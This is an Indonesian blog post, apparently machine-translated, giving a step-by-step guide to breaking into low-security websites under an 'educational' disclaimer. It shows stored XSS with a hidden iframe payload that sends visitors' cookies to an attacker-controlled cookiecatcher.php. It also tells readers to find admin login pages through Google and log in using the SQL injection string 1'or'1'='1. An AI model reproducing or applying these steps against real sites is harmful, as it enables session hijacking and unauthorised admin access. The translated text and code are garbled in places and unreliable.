Catatan: Ini 'Cara' secara ketat untuk tujuan pendidikan, baik untuk membantu orang mulai belajar hacking yang topi putih atau untuk melihat bagaimana hacker bekerja untuk melindungi situs mereka sendiri yang lebih baik. Tutorial ini akan memberikan Anda dengan langkah-langkah tentang cara untuk mendapatkan akses ke banyak situs keamanan rendah.
1.
Menemukan sebuah situs rentan di mana Anda dapat memposting konten. Sebuah papan pesan adalah contoh yang baik. Ingat, jika situs tersebut aman maka ini tidak akan bekerja. window.alert ( "test") window.alert ( "test") window.alert ( "test")
2.Go untuk membuat pos. Anda akan perlu mengetikkan beberapa kode khusus ke dalam "post" yang akan menangkap data semua yang mengklik itu.
Anda akan ingin menguji untuk melihat apakah sistem menyaring kode. Pos
<Script> window.alert ( "test") </ script>
Jika kotak peringatan muncul saat Anda mengklik pada posting Anda, maka situs tersebut rentan terhadap serangan.
3.
Membuat dan meng-upload penangkap cookie Anda. Tujuan dari serangan ini adalah untuk menangkap cookie pengguna, yang memungkinkan Anda akses ke akun mereka untuk situs dengan login yang rentan. Anda akan membutuhkan penangkap kue, yang akan menangkap cookie target Anda dan mengubah rute mereka. Upload penangkap ke situs web Anda memiliki akses ke dan yang mendukung php. Kode penangkap contoh kue dapat ditemukan di bagian sampel.
4. Post dengan penangkap cookie Anda. Masukan kode yang tepat ke dalam pos yang akan menangkap cookie dan mengirim mereka ke situs Anda. Anda akan ingin dimasukkan ke dalam beberapa teks setelah kode untuk mengurangi kecurigaan dan menjaga posting Anda tidak dihapus.
Contoh kode akan terlihat seperti
<Iframe frameborder = "0" height = "0" width = "0" src = "javascript ...: void (document.location = '? YOURURL / cookiecatcher.php c =' document.cookie)> </ iframe>
5
Gunakan cookie dikumpulkan. Setelah ini, Anda dapat menggunakan informasi cookie, yang harus disimpan ke website Anda, untuk tujuan apa pun yang Anda butuhkan.
Cari situs rentan. Anda akan perlu menemukan sebuah situs yang rentan, karena untuk login admin mudah diakses. Coba cari Google untuk admin login.asp.
Login sebagai admin. Ketik admin sebagai username dan menggunakan salah satu dari sejumlah string yang berbeda sebagai password. Ini dapat menjadi salah satu dari sejumlah string yang berbeda tetapi contoh umum adalah 1'or'1 '=' 1.
Sabar. Ini mungkin akan membutuhkan sedikit trial and error.
Mengakses website. Akhirnya, Anda harus dapat menemukan string yang memungkinkan Anda akses admin ke sebuah website, dengan asumsi website ini rentan terhadap serangan.
1
Belajar bahasa pemrograman atau dua. Jika Anda ingin benar-benar belajar cara hack situs, Anda harus memahami bagaimana komputer dan teknologi lainnya bekerja. Belajar menggunakan bahasa pemrograman seperti Python atau SQL, sehingga Anda bisa mendapatkan kontrol yang lebih baik dari komputer dan mengidentifikasi kerentanan dalam sistem.
2
Memiliki keaksaraan dasar HTML. Anda juga akan perlu memiliki pemahaman yang benar-benar baik html dan javascript jika Anda ingin hack website pada khususnya. Ini dapat mengambil waktu untuk belajar, tetapi ada banyak cara gratis untuk belajar di internet, sehingga Anda pasti akan memiliki kesempatan jika Anda ingin mengambil.
3
Konsultasikan dengan whitehats. Whitehats adalah hacker yang menggunakan kekuatan mereka untuk kebaikan, mengekspos kerentanan keamanan dan membuat internet tempat yang lebih baik untuk semua orang. Jika Anda ingin belajar hack dan menggunakan kekuasaan Anda untuk baik atau jika Anda ingin membantu melindungi website Anda sendiri, Anda mungkin ingin menghubungi beberapa whitehats saat ini untuk saran.
4
peretasan penelitian. Jika Anda ingin belajar hack atau jika Anda hanya ingin melindungi diri sendiri, Anda akan perlu melakukan banyak penelitian. Ada begitu banyak cara yang berbeda bahwa website dapat rentan dan daftar adalah selalu berubah, sehingga Anda akan perlu terus-menerus belajar.
5
Tetap up to date. Karena daftar kemungkinan hacks adalah selalu berubah, Anda akan perlu untuk memastikan Anda tetap up to date. Hanya karena Anda terlindungi dari jenis tertentu dari hack sekarang tidak berarti Anda akan aman di masa depan!
0 komentar:
Posting Komentar